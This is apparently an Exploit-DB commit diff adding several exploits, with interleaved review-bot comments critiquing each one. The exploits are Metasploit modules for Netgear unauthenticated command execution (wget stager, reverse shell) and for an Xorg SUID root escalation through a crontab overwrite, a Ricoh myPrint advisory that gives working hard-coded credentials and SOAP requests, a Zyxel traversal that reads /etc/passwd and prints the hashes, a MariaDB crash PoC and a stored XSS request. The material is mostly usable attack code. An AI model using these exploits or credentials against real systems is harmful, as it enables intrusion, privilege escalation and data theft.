DB: 2018-11-28

10 changes to exploits/shellcodes

MariaDB Client 10.1.26 - Denial of Service (PoC)
Arm Whois 3.11 - Buffer Overflow (ASLR)
Xorg X11 Server - SUID privilege escalation (Metasploit)
ELBA5 5.8.0 - Remote Code Execution
Netgear Devices - Unauthenticated Remote Command Execution (Metasploit)
Ricoh myPrint 2.9.2.4 - Hard-Coded Credentials
WordPress Plugins Easy Testimonials 3.2 - Cross-Site Scripting
Ticketly 1.0 - 'kind_id' SQL Injection
No-Cms 1.0 - 'order_by' SQL Injection
Zyxel VMG1312-B10D 5.13AAXA.8 - Directory Traversal
Offensive Security 2018-11-28 11:08:29 +00:00
parent 7967efda82
commit dfd1e454e1
11 changed files with 1105 additions and 0 deletions

exploits/hardware/remote/45909.rb (104 lines, executable file)

@ -0,0 +1,104 @@
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
class MetasploitModule < Msf::Exploit::Remote
Rank = ExcellentRanking
include Msf::Exploit::Remote::HttpClient
include Msf::Exploit::CmdStager
def initialize(info = {})
super(update_info(info,
'Name' => 'Netgear Devices Unauthenticated Remote Command Execution',
'Description' => %q{
From the CVE-2016-1555 page: (1) boardData102.php, (2) boardData103.php,
(3) boardDataJP.php, (4) boardDataNA.php, and (5) boardDataWW.php in
Netgear WN604 before 3.3.3 and WN802Tv2, WNAP210v2, WNAP320, WNDAP350,
WNDAP360, and WNDAP660 before 3.5.5.0 allow remote attackers to execute
arbitrary commands.
},
'Author' =>
[
'Daming Dominic Chen <ddchen[at]cs.cmu.edu>', # Vuln discovery
'Imran Dawoodjee <imrandawoodjee.infosec[at]gmail.com>' # MSF module
],
'License' => MSF_LICENSE,
'References' =>
[
['CVE', '2016-1555'],
['URL', 'https://kb.netgear.com/30480/CVE-2016-1555-Notification?cid=wmt_netgear_organic'],
['PACKETSTORM', '135956'],
['URL', 'http://seclists.org/fulldisclosure/2016/Feb/112']
],
'DisclosureDate' => 'Feb 25 2016', # According to http://seclists.org/fulldisclosure/2016/Feb/112
'Privileged' => true,
'Platform' => 'linux',
'Arch' => ARCH_MIPSBE,
'Payload' => {},
'DefaultOptions' => {
'CMDSTAGER::FLAVOR' => 'wget',
'PAYLOAD' => 'linux/mipsbe/shell_reverse_tcp',
'WfsDelay' => 10 },
'Targets' => [['Automatic', { }]],
'CmdStagerFlavor'=> %w{ echo printf wget },
'DefaultTarget' => 0
))
register_options(
[
OptString.new('TARGETURI', [true, 'Path of the vulnerable URI.', '/boardDataWW.php']), # boardDataWW.php
OptString.new('MAC_ADDRESS', [true, 'MAC address to use (default: random)', Rex::Text.rand_text_hex(12)])
])
end
# check for vulnerability existence
def check
fingerprint = Rex::Text.rand_text_alpha(12) # If vulnerability is present, we will get this back in the response
res = execute_command("echo #{fingerprint}") # the raw POST response
unless res
vprint_error 'Connection failed'
return CheckCode::Unknown
end
unless res.code == 200
return CheckCode::Safe
end
unless res.get_html_document.at('input').to_s.include? fingerprint
return CheckCode::Safe
end
CheckCode::Vulnerable
end
# execute a command, or simply send a POST request
def execute_command(cmd, opts = {})
vars_post = {
'macAddress' => "#{datastore['MAC_ADDRESS']};#{cmd};",
'reginfo' => '1',
'writeData' => 'Submit'
}
send_request_cgi({
'method' => 'POST',
'headers' => { 'Connection' => 'Keep-Alive' },
'uri' => normalize_uri(target_uri.path),
'vars_post' => vars_post
})
rescue ::Rex::ConnectionError
fail_with(Failure::Unreachable, "#{peer} - Failed to connect to the target!")
end
# the exploit method
def exploit
#run a check before attempting to exploit
unless [CheckCode::Vulnerable].include? check
fail_with Failure::NotVulnerable, 'Target is most likely not vulnerable!'
end
execute_cmdstager(linemax: 2048) # maximum 130,000
end
end
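Review bot: the `unless res` branch in `check` (the one returning `CheckCode::Unknown`) is not reached on a connection error, because `execute_command` rescues `::Rex::ConnectionError` and calls `fail_with(Failure::Unreachable, ...)`, which raises instead of returning nil. A check should report Unknown when the host cannot be reached rather than aborting the module, so either drop the rescue from `execute_command` and let `check` handle the nil, or return nil from the rescue block and keep the `fail_with` in `exploit`. Two smaller points: `unless [CheckCode::Vulnerable].include? check` reads more simply as `unless check == CheckCode::Vulnerable`, and the `# maximum 130,000` comment on `execute_cmdstager(linemax: 2048)` should say what that figure refers to.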


@ -0,0 +1,283 @@
# Exploit Title: Ricoh myPrint 2.9.2.4 - Hard-Coded Credentials
# Google Dork: intitle:"ricoh myprint" "Copyright Ricoh. All Rights Reserved"
# Date: 2018-11-19
# Exploit Author: Hodorsec
# Vendor Homepage: https://www.ricoh.com
# Software Link: https://www.ricoh-europe.com/support/product-support/software-support-detail.html?prodId=100-13203
# Versions:
# myPrint - Windows client version 2.9.2.4
# myPrint - Android client version 2.2.7
# Tested on: Ricoh myPrint clients and WSDL webservice
# WSDL URL format: https://{HOST}/RicohmyPrint/MyPrintWebService.asmx?wsdl
# CVE: N/A
# Description:
# Hardcoded credentials in the Ricoh myPrint application 2.9.2.4 for Windows and 2.2.7 for Android
# give access to any externally disclosed myPrint WSDL API, as demonstrated by discovering
# API secrets of related Google cloud printers, encrypted passwords of mail servers and
# names of printed files.
# Additional Information:
# Hardcoded credentials in the Ricoh myPrint application 2.9.2.4 for Windows and 2.2.7 for
# Android (reverse-engineered, identical credentials), gives access
# to any externally disclosed Ricoh myPrint WSDL API. Using the found credentials, several info can be obtained, such as:
# * Show settings such as local paths, used mailserver, mailaddresses for POP/IMAP and encrypted passwords (appears to be stream-based
# encrypted, seeing different lengths of base64 hashes passwords (Algorithm yet unknown)). --> ReadMobileSettings
# * Checks if a password is valid for ANY known user; returns "true" if password is valid for a known user --> IsPasswordValid
# * Shows all user info such as ID, name by looking up email alias --> IdentifierByEmailAlias
# * Show used internal IP addresses and TCP ports of related printers/server for Ricoh myPrint
# * Show related Google cloud printers with API secrets --> ReadGoogleCloudPrinters
# * Show all printjob-statuses with filenames --> GetJobList
# * Show related organizations --> ReadOrganizations
# Affected Components:
# * Tested Ricoh myPrint clients with indicated versions and probably any remotely accessible myPrint webserver with an accessible WSDL API.
# Affected Code:
# * Android client "WebService.java"
...<SNIP>...
public static final class
{
public static final String AUTH_PASS = "Kyg63WfC";
public static final String AUTH_USER = "ricohmyprint";
public static final String NS_RICOH = "http://RicohmyPrint.com/";
public static final String NS_SOAP12 = "http://www.w3.org/2003/05/soap-envelope";
public static final String PRE_RICOH = "ric";
public static final String PRE_SOAP12 = "soap";
public static final String SERVICE = "/RicohmyPrint/myprintwebservice.asmx";
public static final String SUPPORTED_LANGS[] = {
"en", "ca", "de", "es", "fr", "it", "nl", "no", "pl", "pt",
"sv"
};
...<SNIP>...
Attack Type:
* Remote
Attack Vectors:
Steps:
* Download the Android APK or Windows executable installer
* Reverse engineer the APK or DLL's from the Windows installer
* Look for the string "PASS" with a regex tool, which should pop up a hit
* Access the WSDL on a reachable Ricoh myPrint environment and enumerate operations with a SOAP tool (e.g. "ReadMobileSettings")
* Use any operation, substitute the "AuthSoapHd" values for UserName and Password with the found credentials
* Perform the request and check results
Hardcoded Credentials:
* Username: ricohmyprint
* Password: Kyg63WfC
Header requirement:
Required for using in an SOAP WSDL POST message as a header with values:
<soapenv:Header>
<ric:AuthSoapHd>
<ric:UserName><![CDATA[ricohmyprint]]></ric:UserName>
<ric:Password><![CDATA[Kyg63WfC]]></ric:Password>
<ric:Version><![CDATA[0.1]]></ric:Version>
<ric:Application><![CDATA[Desktop]]></ric:Application>
<ric:DeviceId><![CDATA[1]]></ric:DeviceId>
</ric:AuthSoapHd>
</soapenv:Header>
Examples:
* ReadMobileSettings
---------------------------------------------
REQUEST
<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/" xmlns:ric="http://RicohmyPrint.com/">
<soapenv:Header>
<ric:AuthSoapHd>
<ric:UserName><![CDATA[ricohmyprint]]></ric:UserName>
<ric:Password><![CDATA[Kyg63WfC]]></ric:Password>
<ric:Version><![CDATA[0.1]]></ric:Version>
<ric:Application><![CDATA[Desktop]]></ric:Application>
<ric:DeviceId><![CDATA[1]]></ric:DeviceId>
</ric:AuthSoapHd>
</soapenv:Header>
<soapenv:Body>
<ric:ReadMobileSettings/>
</soapenv:Body>
</soapenv:Envelope>
RESPONSE
<?xml version="1.0" encoding="utf-8"?>
<soap:Envelope xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema">
<soap:Body>
<ReadMobileSettingsResponse xmlns="http://RicohmyPrint.com/">
<ReadMobileSettingsResult>
<WatchFolder>C:\ProgramData\RICOH\WatchFolder</WatchFolder>
<ProcessFolder>C:\ProgramData\RICOH\ProcessFolder</ProcessFolder>
<WebUploadFolder>C:\ProgramData\RICOH\WebUploadFolder</WebUploadFolder>
<MaximumNumberProcessesRunningAllowed>0</MaximumNumberProcessesRunningAllowed>
<ToFilePrinterName>myPrintToFile</ToFilePrinterName>
<PrinterDriverName>RICOH Aficio MP C3500 PCL 6</PrinterDriverName>
<POPIMAP>
<EmailHandling>SINGLE</EmailHandling>
<RetrievingInterval>5</RetrievingInterval>
<EmailProtocol>POP3</EmailProtocol>
<EmailServer>pop.someserver.local</EmailServer>
<Port>110</Port>
<PrintEmailBody>true</PrintEmailBody>
<UserName>print@someserver.local</UserName>
<Password>REDACTED</Password>
<Domain />
<EmailWebservice />
<ExchangeVersion>5</ExchangeVersion>
<OverrideCertificateCheck>false</OverrideCertificateCheck>
</POPIMAP>
<SMTP>
<SmtpServer>smtp.someserver.local</SmtpServer>
<Port>25</Port>
<EmailDisplayName>Ricoh myPrint</EmailDisplayName>
<EmailFrom>someuser@someserver.local</EmailFrom>
<EnableSsl>false</EnableSsl>
<UserName />
<Password>REDACTED</Password>
</SMTP>
<GCP>
<Id>0</Id>
<XmppPort>80</XmppPort>
<UseSocksProxy>false</UseSocksProxy>
<SocksProxyServer />
<SocksProxyVersion>5</SocksProxyVersion>
<SocksProxyPort>1080</SocksProxyPort>
<SocksProxyUser />
</GCP>
<LPRPrinterPort>0</LPRPrinterPort>
<UseLPR>false</UseLPR>
<EmailRefusal>postmaster</EmailRefusal>
</ReadMobileSettingsResult>
</ReadMobileSettingsResponse>
</soap:Body>
</soap:Envelope>
---------------------------------------------
* IdentifierByEmailAlias
---------------------------------------------
REQUEST:
<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/" xmlns:ric="http://RicohmyPrint.com/">
<soapenv:Header>
<ric:AuthSoapHd>
<ric:UserName><![CDATA[ricohmyprint]]></ric:UserName>
<ric:Password><![CDATA[Kyg63WfC]]></ric:Password>
<ric:Version><![CDATA[a]]></ric:Version>
<ric:Application><![CDATA[b]]></ric:Application>
<ric:DeviceId><![CDATA[c]]></ric:DeviceId>
</ric:AuthSoapHd>
</soapenv:Header>
<soapenv:Body>
<ric:IdentifierByEmailAlias>
<!--Optional:-->
<ric:emailAlias>admin</ric:emailAlias>
</ric:IdentifierByEmailAlias>
</soapenv:Body>
</soapenv:Envelope>
RESPONSE:
<soap:Envelope xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema">
<soap:Body>
<IdentifierByEmailAliasResponse xmlns="http://RicohmyPrint.com/">
<IdentifierByEmailAliasResult>
<Exists>true</Exists>
<Account>
<Id>1337</Id>
<AccountId>83e754ff-fa1d-48b6-adb2-7cb60a22476d</AccountId>
<UserName>admin</UserName>
<Emailaddress>someuser@someserver.local</Emailaddress>
<PersonalmyPrintId>1osd9KJ</PersonalmyPrintId>
<Balance>5</Balance>
<BalanceFormatted>€ 5,00</BalanceFormatted>
<Primarypin>123456</Primarypin>
<SecondaryPin/>
<OrganisationId>1</OrganisationId>
<ByClientCreated>false</ByClientCreated>
<IsActivated>true</IsActivated>
<GuestAccount>false</GuestAccount>
<Aliasses/>
<Transactions/>
<Language>GB</Language>
<MpPrintingPreferences>
<Id>0</Id>
<DuplexPreference>TwoSidedLongEdge</DuplexPreference>
<ColorPreference>Monochrome</ColorPreference>
<ChangingDuplexEnabled>true</ChangingDuplexEnabled>
<ChangingColorEnabled>true</ChangingColorEnabled>
<StaplePreference>StapleTopLeft</StaplePreference>
<PagePerSheetPreference>One</PagePerSheetPreference>
<ChangingStapleEnabled>true</ChangingStapleEnabled>
<ChangingPagePerSheetEnabled>true</ChangingPagePerSheetEnabled>
</MpPrintingPreferences>
<QpilotCardID/>
<ClientType>IDPLocal</ClientType>
<Administrator>false</Administrator>
<HelpDesk>false</HelpDesk>
<PrintQueue>
<Id>1</Id>
<PrinterId>1</PrinterId>
<PrintQueueType>LPR</PrintQueueType>
<PrinterName>Default printer</PrinterName>
<PrinterAddress>127.0.0.1</PrinterAddress>
<QueueName>lp</QueueName>
<Port>515</Port>
<IsPublic>true</IsPublic>
<Priority>0</Priority>
<Active>true</Active>
</PrintQueue>
<Domain/>
</Account>
</IdentifierByEmailAliasResult>
</IdentifierByEmailAliasResponse>
</soap:Body>
</soap:Envelope>
---------------------------------------------
Soap Endpoints:
* ApplyAgreementAcceptance
* ChangePassword
* ClearCache
* CreateAccount
* CreateAccountByCardId
* FinishedJobProcessing
* GetConditionsUri
* GetImage
* GetJobList
* GetLanguageTable
* GetPrintCapabilities
* GetPrintQueueRuleResult
* GetSupportUri
* IdentifierByEmailAlias
* IsPasswordValid
* LogIn
* Operation
* ReadAccount
* ReadGoogleCloudPrinters
* ReadMobileSettings
* ReadMpPrintQueues
* ReadOrganizations
* ReadSettings
* ReSendPincode
* ResetPassword
* RetrieveCloudPrintJobsAllowed
* RetrieveEmailAllowed
* SendCancelPrintJob
* SendHeartbeat
* SendPrinterName
* Test
* UpdateAccount
* UpdateGoogleCloudPrinter
* UploadFile
* UploadFileAndPrintTicket
* VerifyJobProcessing
* VoucherToCash
* WaitingJob
* WriteLog
Disclosure Timeline using CERT/CC disclosure policy:
- 04-10-18: Requested CVE
- 05-10-18: Contacted vendor for initial contact, used several publicly known mailaddresses
- 10-10-18: Contacted CERT for Vulnerability Disclosure coordination due to no response from vendor
- 22-10-18: CERT responded it received no response on their behalf from vendor
- 22-10-18: Sent reminder to vendor
- 19-11-18: Public Disclosure
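Review bot: the timeline ends with no vendor response and no fixed version, but the advisory never says so explicitly and offers no mitigation; "Affected Components" should state that no patched client version is known and that the `/RicohmyPrint/MyPrintWebService.asmx` endpoint should not be reachable from untrusted networks while the credentials cannot be changed. The two examples also show something worth calling out: the first request sends `0.1`/`Desktop`/`1` for `Version`, `Application` and `DeviceId`, the second sends `a`/`b`/`c` and is accepted, so only `UserName` and `Password` appear to be validated and those three header fields cannot be relied on to identify a client when reviewing web-service logs. Finally, the `Attack Vectors:` heading has no content; merge it with `Steps:`.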


@ -0,0 +1,21 @@
# Exploit Title: Zyxel VMG1312-B10D 5.13AAXA.8 - Directory Traversal
# Date: 2018-11-17
# Exploit Author: numan türle
# Vendor Homepage: https://www.zyxel.com/
# Software Link: https://www.zyxel.com/products_services/Wireless-N-VDSL2-4-port-Gateway-with-USB-VMG1312-B10D/
# Tested on: macOS
# Fixed firmware: 5.13(AAXA.8)C0
# PoC
@modem_gateway = "192.168.1.1" // default address
http://@modem_gateway/../../../../../../../../../../../../etc/passwd
here are the contents :
############################## contents ##############################
nobody:x:99:99:nobody:/nonexistent:/bin/false
root:zKtrESdI2DPME:0:0:root:/home/root:/bin/sh
supervisor:.t7H3bCRtJ6UY:12:12:supervisor:/home/supervisor:/bin/sh
admin:avHcRxJLoXvas:21:21:admin:/home/admin:/bin/sh
user:AebeEcyKDnOzI:31:31:user:/home/user:/bin/sh
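Review bot: the PoC line `@modem_gateway = "192.168.1.1" // default address` mixes a Ruby-style variable with a C-style comment, and the URL `http://@modem_gateway/...` on the next line would be parsed by any client as an empty userinfo followed by a host named `modem_gateway`; write the gateway address as a plain placeholder in the URL and state the default address in prose. The header is also contradictory: the title names 5.13AAXA.8 as the affected version while `# Fixed firmware: 5.13(AAXA.8)C0` names what looks like the same release as the fix, so give the affected and fixed firmware versions separately. Lastly, the quoted `/etc/passwd` includes the crypt hashes of the root, supervisor, admin and user accounts; redact the hash field, since the `nobody` line alone already demonstrates the traversal.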


@ -0,0 +1,63 @@
# Exploit Title: MariaDB Client 10.1.26 - Denial of Service (PoC)
# Google Dork: None
# Date: 2018-11-16
# Exploit Author: strider
# Software Link: https://github.com/MariaDB/server
# Version: mysql Ver 15.1 Distrib 10.1.26-MariaDB, for debian-linux-gnu (x86_64) using readline 5.2
# Tested on: Debian 9 Stretch x64 / Ubuntu 18.04 x86_64
# CVE : None
# Description:
# MariaDB uses environment variables. The PAGER variable is vulnerable to a bufferoverflow.
# If the environment variable PAGER is greater or equals 512 characters it will crash and make client unusable.
# This is caused by a the function strmov which takes all from source and copy that
# into destination which have a fixed size.
Codepart:
static char default_pager[FN_REFLEN];
char *tmp=getenv("PAGER");
if (tmp && strlen(tmp))
{
default_pager_set= 1;
strmov(default_pager, tmp);
}
Proof of Concept:
Step 1:
export PAGER=$(python -c "print '\x41' * 512")
Step 2:
mariadb -u user -p
Crash
---------------------------------------------------------------------
peda output:
Program received signal SIGSEGV, Segmentation fault.
[----------------------------------registers-----------------------------------]
RAX: 0x555555b73600 ('A' <repeats 200 times>...)
RBX: 0x555555b7cbc8 ('A' <repeats 200 times>...)
RCX: 0x70 ('p')
RDX: 0x0
RSI: 0x555555bafe40 ('A' <repeats 200 times>...)
RDI: 0x555555bb0040
RBP: 0x7fffffffdfa0 --> 0x555555639a80 (<__libc_csu_init>: push r15)
RSP: 0x7fffffffdd48 --> 0x55555558e5bc (<main+620>: mov rax,QWORD PTR [r12])
RIP: 0x7ffff677e2e6 (<__strcpy_sse2_unaligned+374>: movdqu XMMWORD PTR [rdi-0x40],xmm4)
R8 : 0x555555b92580 ('A' <repeats 200 times>...)
R9 : 0x20 (' ')
R10: 0x7fffffffa5a0 --> 0x7fffffffa5d0 --> 0x7fffffffdb80 --> 0x7fffffffdc10 --> 0x0
R11: 0x7ffff6846d68 --> 0xfff37778fff37768
R12: 0x555555b00bc0 --> 0x555555b00b80 --> 0x40000000 ('')
R13: 0x7ffff6a846e8 --> 0x7ffff6a84600 --> 0xfbad2084
R14: 0x0
R15: 0x0
EFLAGS: 0x10202 (carry parity adjust zero sign trap INTERRUPT direction overflow)
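Review bot: the description and the trace do not line up: the text blames `strmov`, while the register dump shows the fault inside `__strcpy_sse2_unaligned` with heap addresses in RAX, RBX and RSI, so explain how `strmov` resolves to that libc routine and where the copy destination lives, otherwise a reader cannot match the crash to the static `default_pager` buffer. The 512 threshold should also be tied to the declaration: `default_pager[FN_REFLEN]` is quoted but the value of `FN_REFLEN` is never stated, and a string of exactly 512 characters leaves no room for the terminating NUL, which is presumably why "greater or equals 512" is the trigger. Finally, `PAGER` is set in the user's own environment, so the impact is a crash of that user's own client with no privilege boundary crossed; the severity should say so.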

exploits/multiple/local/45908.rb (215 lines, executable file)

@ -0,0 +1,215 @@
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
class MetasploitModule < Msf::Exploit::Local
Rank = GoodRanking
include Msf::Exploit::EXE
include Msf::Exploit::FileDropper
include Msf::Post::File
include Msf::Post::Linux::Priv
include Msf::Post::Linux::Kernel
def initialize(info = {})
super(update_info(info,
'Name' => 'Xorg X11 Server SUID privilege escalation',
'Description' => %q{
This module attempts to gain root privileges with SUID Xorg X11 server
versions 1.19.0 < 1.20.3.
A permission check flaw exists for -modulepath and -logfile options when
starting Xorg. This allows unprivileged users that can start the server
the ability to elevate privileges and run arbitrary code under root
privileges.
This module has been tested with OpenBSD 6.3, 6.4, and CentOS 7 (1708).
CentOS default install will require console auth for the users session.
Cron launches the payload so if Selinux is enforcing exploitation
may still be possible, but the module will bail.
Xorg must have SUID permissions and may not start if running.
On exploitation a crontab.old backup file will be created by Xorg.
This module will remove the .old file and restore crontab after
successful exploitation. Failed exploitation may result in a corrupted
crontab. On successful exploitation artifacts will be created consistant
with starting Xorg and running a cron.
},
'License' => MSF_LICENSE,
'Author' =>
[
'Narendra Shinde', # Discovery and exploit
'Raptor - 0xdea', # Modified exploit for cron
'Aaron Ringo', # Metasploit module
'Brendan Coles <bcoles[at]gmail.com>' # Metasploit module
],
'DisclosureDate' => 'Oct 25 2018',
'References' =>
[
[ 'CVE', '2018-14665' ],
[ 'BID', '105741' ],
[ 'EDB', '45697' ],
[ 'EDB', '45742' ],
[ 'EDB', '45832' ],
[ 'URL', 'https://www.securepatterns.com/2018/10/cve-2018-14665-xorg-x-server.html' ],
[ 'URL', 'https://github.com/0xdea/exploits/blob/master/openbsd/raptor_xorgasm' ]
],
'Platform' => %w[openbsd linux],
'Arch' => [ARCH_CMD, ARCH_X86, ARCH_X64],
'SessionTypes' => %w[shell meterpreter],
'Targets' =>
[
['OpenBSD', {
'Platform' => 'unix',
'Arch' => [ ARCH_CMD ] } ],
['Linux x64', {
'Platform' => 'linux',
'Arch' => [ ARCH_X64 ] } ],
['Linux x86', {
'Platform' => 'linux',
'Arch' => [ ARCH_X86 ] } ]
],
'DefaultOptions' =>
{
'PAYLOAD' => 'cmd/unix/reverse_openssl',
'WfsDelay' => 120
},
'DefaultTarget' => 0))
register_advanced_options(
[
OptString.new('WritableDir', [ true, 'A directory where we can write files', '/tmp' ]),
OptString.new('Xdisplay', [ true, 'Display exploit will attempt to use', ':1' ]),
OptBool.new('ConsoleLock', [ true, 'Will check for console lock under linux', true ])
]
)
end
def check
# linux checks
uname = cmd_exec "uname"
if uname =~ /linux/i
vprint_status "Running additional check for Linux"
if datastore['ConsoleLock']
user = cmd_exec "id -un"
unless exist? "/var/run/console/#{user}"
vprint_error "No console lock for #{user}"
return CheckCode::Safe
end
vprint_good "Console lock for #{user}"
end
if selinux_installed?
if selinux_enforcing?
vprint_error 'Selinux is enforcing'
return CheckCode::Safe
end
end
vprint_good "Selinux is not an issue"
end
# suid program check
xorg_path = cmd_exec "command -v Xorg"
unless xorg_path.include?("Xorg")
vprint_error "Could not find Xorg executable"
return CheckCode::Safe
end
vprint_good "Xorg path found at #{xorg_path}"
unless setuid? xorg_path
vprint_error "Xorg binary #{xorg_path} is not SUID"
return CheckCode::Safe
end
vprint_good "Xorg binary #{xorg_path} is SUID"
# version check
x_version = cmd_exec "Xorg -version"
if x_version.include?("Release Date")
v = Gem::Version.new(x_version.scan(/\d\.\d+\.\d+/).first)
unless v.between?(Gem::Version.new('1.19.0'), Gem::Version.new('1.20.2'))
vprint_error "Xorg version #{v} not supported"
return CheckCode::Safe
end
elsif x_version.include?("Fatal server error")
vprint_error "User probably does not have console auth"
vprint_error "Below is Xorg -version output"
vprint_error x_version
return CheckCode::Safe
else
vprint_warning "Could not parse Xorg -version output"
return CheckCode::Appears
end
vprint_good "Xorg version #{v} is vulnerable"
# process check for /X
proc_list = cmd_exec "ps ax"
if proc_list.include?('/X ')
vprint_warning('Xorg in process list')
return CheckCode::Appears
end
vprint_good('Xorg does not appear running')
return CheckCode::Vulnerable
end
def on_new_session(session)
if session.type.to_s.eql? 'meterpreter'
session.core.use 'stdapi' unless session.ext.aliases.include? 'stdapi'
session.sys.process.execute '/bin/sh', "-c \"#{@clean_up}\""
else
session.shell_command(@clean_up)
end
print_good "Returning session after cleaning"
ensure
super
end
def exploit
check_status = check
if check_status == CheckCode::Appears
print_warning 'Could not get version or Xorg process possibly running, may fail'
elsif check_status == CheckCode::Safe
fail_with Failure::NotVulnerable, 'Target not vulnerable'
end
if is_root?
fail_with Failure::BadConfig, 'This session already has root privileges'
end
unless writable? datastore['WritableDir']
fail_with Failure::BadConfig, "#{datastore['WritableDir']} is not writable"
end
print_good 'Passed all initial checks for exploit'
pscript = "#{datastore['WritableDir']}/.session-#{rand_text_alphanumeric 5..10}"
@clean_up = "/bin/cat #{pscript}.b > /etc/crontab ; /bin/rm -f #{pscript}.b /etc/crontab.old"
xdisplay = datastore['Xdisplay']
# Uploading file crontab will run
print_status 'Uploading your payload, this could take a while'
if payload.arch.first == 'cmd'
write_file(pscript, payload.encoded)
else
write_file(pscript, generate_payload_exe)
end
register_file_for_cleanup pscript
chmod pscript
# Exploit steps on crontab so backing it up
cmd_exec "cat /etc/crontab > #{pscript}.b"
# Actual exploit with cron overwrite
print_status 'Trying /etc/crontab overwrite'
cmd_exec "cd /etc ; Xorg -fp '* * * * * root #{pscript}' -logfile crontab #{xdisplay} & >/dev/null"
Rex.sleep 5
cmd_exec "pkill Xorg"
Rex.sleep 1
cron_check = cmd_exec "grep -F #{pscript} /etc/crontab"
unless cron_check.include? pscript
rm_f "#{pscript}.b"
print_error 'Deleting crontab backup'
fail_with Failure::NotVulnerable, '/etc/crontab not modified'
end
print_good '/etc/crontab overwrite successful. Waiting for job to run (may take a minute)...'
end
end
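Review bot: in `exploit`, the command `Xorg -fp '...' -logfile crontab #{xdisplay} & >/dev/null` applies the redirection to an empty command following the `&`, not to Xorg, so Xorg's output is not silenced; if that is the intent the form is `... >/dev/null 2>&1 &`. Two documentation points: the OpenBSD target declares `'Platform' => 'unix'` while the module-level `'Platform'` is `%w[openbsd linux]`, which should be reconciled or explained, and "consistant" in the description should be "consistent". On the `cron_check` failure path, `print_error 'Deleting crontab backup'` is printed after `rm_f` has already run; swap the two lines so the log reflects the order of events.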


@ -0,0 +1,30 @@
# Exploit Title: Wordpress Plugins Easy Testimonials 3.2 - Cross-Site Scripting
# Date: 2018-11-23
# Exploit Author: En_dust
# Vendor Homepage: https://wordpress.org/plugins/easy-testimonials/
# Software Link: https://wordpress.org/plugins/easy-testimonials/
# Version: 3.2
# CVE : N/A
# Tested on: Windows 10 x64
# description:
# A Stored Cross-site scripting (XSS) was discovered in wordpress plugins easy testimonials 3.2.
# Three parameters(_ikcf_client _ikcf_position _ikcf_other) have Cross-Site Scripting.
# POC
# XSS Stored
POST http://localhost/wp-admin/post.php HTTP/1.1
Host: localhost
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:56.0) Gecko/20100101 Firefox/56.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 2152
Referer: http://localhost/wp-admin/post-new.php?post_type=testimonial&wp-post-new-reload=true
Cookie: wp-saving-post=25-check; wp-saving-post=22-saved; wordpress_524b5a925bc7b1b05f5b295d7fcd09b9=admin%7C1543134496%7CkuybvZvg3evKxitZn7s2lZSoaeDOfbTwXP0iMKFz425%7C481919de475c08441e455ffe01f4b8a241ea13f3a4255be476841ddc281597bc; wp-settings-time-1=1542959022; wp-settings-1=mfold%3Do%26libraryContent%3Dbrowse%26posts_list_mode%3Dexcerpt; PHPSESSID=au6fo2rac6sn2hgk0mnniq17k2; wordpress_test_cookie=WP+Cookie+check; wordpress_logged_in_524b5a925bc7b1b05f5b295d7fcd09b9=admin%7C1543134496%7CkuybvZvg3evKxitZn7s2lZSoaeDOfbTwXP0iMKFz425%7C9bce6802e21d94bc37ab3eabf8dfe2950603d327e32a8ad14e167b4550d036dc
Connection: keep-alive
Upgrade-Insecure-Requests: 1
_wpnonce=b3ca69b020&_wp_http_referer=%2Fwp-admin%2Fpost-new.php%3Fpost_type%3Dtestimonial&user_ID=1&action=editpost&originalaction=editpost&post_author=1&post_type=testimonial&original_post_status=auto-draft&referredby=&_wp_original_http_referer=&auto_draft=&post_ID=25&meta-box-order-nonce=c25a6e37b2&closedpostboxesnonce=4784cc9ba9&post_title=test&samplepermalinknonce=f39f8eec26&content=test&wp-preview=&hidden_post_status=draft&post_status=draft&hidden_post_password=&hidden_post_visibility=public&visibility=public&post_password=&aa=2018&mm=11&jj=23&hh=17&mn=12&ss=56&hidden_mm=11&cur_mm=11&hidden_jj=23&cur_jj=23&hidden_aa=2018&cur_aa=2018&hidden_hh=17&cur_hh=17&hidden_mn=12&cur_mn=12&original_publish=%E5%8F%91%E5%B8%83&publish=%E5%8F%91%E5%B8%83&tax_input%5Beasy-testimonial-category%5D%5B%5D=0&neweasy-testimonial-category=%E6%96%B0%E5%88%86%E7%B1%BB%E7%9B%AE%E5%BD%95%E5%90%8D&neweasy-testimonial-category_parent=-1&_ajax_nonce-add-easy-testimonial-category=50d8975094&my-custom-fields_wpnonce=b074ff3409&_ikcf_client=[XSS]&_ikcf_email=test%40test.com&_ikcf_position=[XSS]&_ikcf_other=[XSS]&_ikcf_rating=1&excerpt=&metakeyselect=%23NONE%23&metakeyinput=&metavalue=&_ajax_nonce-add-meta=81df7811e1&post_name=&post_grid_post_settings_input_nonce=95c656b2da&_wp_http_referer=%2Fwp-admin%2Fpost-new.php%3Fpost_type%3Dtestimonial&post_grid_post_settings%5Bpost_skin%5D=flat&post_grid_post_settings%5Bcustom_thumb_source%5D=http%3A%2F%2Fwww.wordpress.com%2Fwp-content%2Fplugins%2Fpost-grid%2Fassets%2Ffrontend%2Fcss%2Fimages%2Fplaceholder.png&post_grid_post_settings%5Bfont_awesome_icon%5D=&post_grid_post_settings%5Bfont_awesome_icon_color%5D=737272&post_grid_post_settings%5Bfont_awesome_icon_size%5D=50px&post_grid_post_settings%5Bcustom_youtube_id%5D=&post_grid_post_settings%5Bcustom_vimeo_id%5D=&post_grid_post_settings%5Bcustom_dailymotion_id%5D=&post_grid_post_settings%5Bcustom_mp3_url%5D=&post_grid_post_settings%5Bcustom_soundcloud_id%5D=
